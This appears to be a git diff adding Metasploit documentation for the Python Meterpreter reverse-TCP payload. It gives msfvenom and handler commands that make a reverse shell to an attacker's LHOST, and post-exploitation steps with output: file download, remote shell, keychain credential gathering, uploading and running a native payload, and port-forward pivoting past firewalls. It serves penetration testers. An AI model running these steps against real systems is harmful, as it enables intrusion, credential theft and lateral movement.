diff --git a/documentation/modules/payload/python/meterpreter/reverse_tcp.md b/documentation/modules/payload/python/meterpreter/reverse_tcp.md new file mode 100644 index 0000000000..fb47ba374e --- /dev/null +++ b/documentation/modules/payload/python/meterpreter/reverse_tcp.md @@ -0,0 +1,358 @@ +python/meterpreter/reverse_tcp allows you to remotely control the compromised system. It is a +unique payload to the Metasploit Framework, because it is cross-platform. And since Python is +a very popular programming language, some operating systems such as Ubuntu even support it +by default. + +When using an exploit, using a cross-platform payload like python/meterpreter/reverse_tcp also +means you don't need to worry about which target/platform to select, the payload should work +for all of them. + +## Vulnerable Application + +The Python Meterpreter is suitable for any systems that support Python. Some operating +systems such as Ubuntu, Debian, Arch Linux, and OS X have it by default. The Python +Meterpreter supports the CPython implementation versions 2.5-2.7 and 3.1+. + +## Deploying python/meterpreter/reverse_tcp + +python/meterpreter/reverse_tcp is typically used in two different ways. + +First, it can be used with an exploit as long as the Python platform is supported. This sort +of information can usually be found when you use the ```info``` command like this: + +``` +msf exploit(ms14_064_packager_python) > info + + Name: MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python + Module: exploit/windows/fileformat/ms14_064_packager_python + Platform: Python + Privileged: No + License: Metasploit Framework License (BSD) + Rank: Excellent + Disclosed: 2014-11-12 + +.... more info here ... +``` + +Or, you can check the exploit's target list by doing ```show targets```, there might be Python +on the list. + +If your exploit supports Python, here is how to load it: + +1. In msfconsole, select the exploit. +2. Configure the options for that exploit. +3. Do: ```set PAYLOAD python/meterpreter/reverse_tcp``` +4. Set the ```LHOST``` datastore option, which is the [IP that the payload should connect to](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit). +5. Do ```exploit```. If the exploit is successful, it should execute that payload. + +Another way to use the Python Meterpreter is to generate it as a Python file. Normally, you would +want to do this with msfvenom, like this: + +``` +./msfvenom -p python/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/python.py +``` + +## Important Basic Commands + +Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the Python Meterpreter +has less commands, but here's a list of all the common ones you might need: + +**pwd command** + +The ```pwd``` command tells you the current working directory. For example: + +``` +meterpreter > pwd +/Users/sinn3r/Desktop +``` + +**cd command** + +The ```cd``` command allows you to change directories. Example: + +``` +meterpreter > cd /Users/sinn3r/Desktop +meterpreter > pwd +/Users/sinn3r/Desktop +``` + +**cat command** + +The ```cat``` command allows you to see the content of a file: + +``` +meterpreter > cat /tmp/data.txt +Hello World! +``` + +**upload command** + +The ```upload``` command allows you to upload a file to the remote target. For example: + +``` +meterpreter > upload /tmp/data.txt /Users/sinn3r/Desktop +[*] uploading : /tmp/data.txt -> /Users/sinn3r/Desktop +[*] uploaded : /tmp/data.txt -> /Users/sinn3r/Desktop/data.txt +meterpreter > +``` + +**download command** + +The ```download``` command allows you to download a file from the remote target to your machine. +For example: + +``` +meterpreter > download /Users/sinn3r/Desktop/data.txt /tmp/pass.txt +[*] downloading: /Users/sinn3r/Desktop/data.txt -> /tmp/pass.txt/data.txt +[*] download : /Users/sinn3r/Desktop/data.txt -> /tmp/pass.txt/data.txt +meterpreter > +``` + +**search command** + +The ```search``` command allows you to find files on the remote file system. For example, +this shows how to find all text files in the current directory: + +``` +meterpreter > search -d . -f *.txt +Found 2 results... + .\pass.txt (13 bytes) + ./creds\data.txt (83 bytes) +meterpreter > +``` + +Without the ```-d``` option, the command will attempt to search in all drives. + +The ```-r``` option for the command allows you to search recursively. + + +**getuid command** + +The ```getuid``` command tells you the current user that Meterpreter is running on. For example: + +``` +meterpreter > getuid +Server username: root +``` + +**execute command** + +The ```execute``` command allows you to execute a command or file on the remote machine. + +The following examples uses the command to create a text file: + +``` +meterpreter > execute -f echo -a "hello > /tmp/hello.txt" +Process 73642 created. +meterpreter > +``` + +**ps command** + +The ```ps``` command lists the running processes on the remote machine. + +**shell command** + +The ```shell``` command allows you to interact with the remote machine's command prompt (or shell). +For example: + +``` +meterpreter > shell +Process 74513 created. +Channel 2 created. +sh-3.2# +``` + +If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel. + +**sysinfo** + +The ```sysinfo``` command shows you basic information about the remote machine. Such as: + +* Computer name +* OS name +* Architecture +* Meterpreter type + +## Using a Post Module + +One of the best things about Meterprter is you have access to a variety of post modules that +"shell" sessions might not have. Post modules provide you with more capabilities to collect +data from the remote machine automatically. For example, stealing credentials from the system +or third-party applications, or modify settings, etc. + +To use a post module from the Meterpreter prompt, simply use the ```run``` command. The following +is an example of collecting OS X keychain information using the enum_keychain post module: + +``` +meterpreter > run post/osx/gather/enum_keychain + +[*] The following keychains for root were found: + "/Users/sinn3r/Library/Keychains/login.keychain" + "/Library/Keychains/System.keychain" +[+] 192.168.1.209:58023 - Keychain information saved in /Users/sinn3r/.msf4/loot/20160705211412_http_192.168.1.209_macosx.keychain._271980.txt +meterpreter > +``` + +## Using the Post Exploitation API in IRB + +To enter IRB, do the following at the Meterpreter prompt: + +``` +meterpreter > irb +[*] Starting IRB shell +[*] The 'client' variable holds the meterpreter client + +>> +``` + +**The client object** + +The client object in Meterpreter allows you to control or retrieve information about the host. For +example, this allows you to get the current privilege our payload is running as: + +``` +>> client.sys.config.getuid +=> "root" +``` + +To explore the client object, there are a few tricks. For example, you can use the #inspect method +to inspect it: + +``` +>> client.inspect +``` + +You can also use the #methods method to see what methods you can use: + +``` +>> client.methods +``` + +To review the source of the method, you can use the #source_location method. For example, say we +want to see the source code for the #getuid method: + +``` +>> client.sys.config.method(:getuid).source_location +=> ["/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb", 32] +``` + +The first element of the array is the location of the file. The second is the line number of +the method. + +**Railgun** + +If you are familiar with using the post exploitation API for Windows, you probably know about +Railgun. Unfortunately, Railgun is not available in Python Meterpreters. + +## Switching to a Native Meterpreter + +The Python Meterpreter currently does not quite have the same strength as a native Meterpreter, +therefore there are times you will want to migrate to a native one to expose yourself with more +features. + +There are many ways to migrate to a native Meterpreter, some common approaches: + +**Example 1: Upload and Execute** + +Step 1: Produce a native Meterpreter, such as: + +``` +./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=5555 -f exe -o /tmp/native.exe +``` + +Step 2: Start another handler for the native payload: + +``` +./msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST [IP]; set LPORT 5555; run" +``` + +Step 3: Upload the native via the Python Meterpreter session: + +``` +meterpreter > upload /tmp/native.exe C:\\Users\\sinn3r\\Desktop +[*] uploading : /tmp/native.exe -> C:\Users\sinn3r\Desktop +[*] uploaded : /tmp/native.exe -> C:\Users\sinn3r\Desktop\native.exe +meterpreter > +``` + +Step 4: Execute the native payload: + +``` +meterpreter > execute -H -f C:\\Users\\sinn3r\\Desktop\\native.exe +Process 2764 created. +``` + +And then your other handler (for the native payload) should receive that session: + +``` +[*] Starting the payload handler... +[*] Sending stage (957999 bytes) to 192.168.1.220 +[*] Meterpreter session 1 opened (192.168.1.209:5555 -> 192.168.1.220:49306) at 2016-07-05 21:48:04 -0500 + +meterpreter > sysinfo +Computer : WIN-6NH0Q8CJQVM +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x86 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/win32 +meterpreter > +``` + +**Example 2: Using exploit/multi/script/web_delivery** + +Another way to migrate to a native Meterpreter is by using the exploit/multi/script/web_delivery +module. To learn how, please read the module documentation for that module. + +## Routing through the portfwd command + +The portfwd command allows you to talk to a remote service like it's local. For example, if you +cannot talk to the SMB service remotely on the compromised host because it is firewalled, then +you can use portfwd to establish that tunnel: + +``` +meterpreter > portfwd add -l 445 -p 445 -r 192.168.1.220 +[*] Local TCP relay created: :445 <-> 192.168.1.220:445 +meterpreter > portfwd + +Active Port Forwards +==================== + + Index Local Remote Direction + ----- ----- ------ --------- + 1 0.0.0.0:445 192.168.1.220:445 Forward +``` + +And then talk to it like it's a local service: + +``` +msf auxiliary(smb_version) > run + +[*] 127.0.0.1:445 - Host is running Windows 7 Ultimate SP1 (build:7601) +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` + +## Routing through msfconsole + +The route command from the msf prompt can also be used to bypass firewall like portfwd, but it also +allows you to connect to hosts on a different network through the compromised machine. + +To do that, first off, look at the ifconfig/ipconfig output and determine your pivot point: + +``` +meterpreter > ipconfig +``` + +Make sure you know the subnet, netmask, and the Meterpreter/session ID. Return to the msf prompt, +and establish that route: + +``` +msf > route add 192.168.1.0 255.255.255.0 1 +``` + +At that point, you should have a working pivot. You can use other Metasploit modules to explore +or exploit more hosts on the network, or use auxiliary/server/socks4a and [Proxychains](http://proxychains.sourceforge.net/) to allow +other third-party tools to do the same. diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md index 0b65ce91bf..ea2e76a9bc 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -580,7 +580,7 @@ The route command in Meterpreter allows you change the routing table that is on The portfwd command allows you to talk to a remote service like it's local. For example, if you are able to compromise a host via SMB, but are not able to connect to the remote desktop service, then you can do: ``` -meterpreter > portfwd add –l 3389 –p 3389 –r > target host > +meterpreter > portfwd add –l 3389 –p 3389 –r [Target Host] ``` And that should allow you to connect to remote desktop this way on the attacker's box: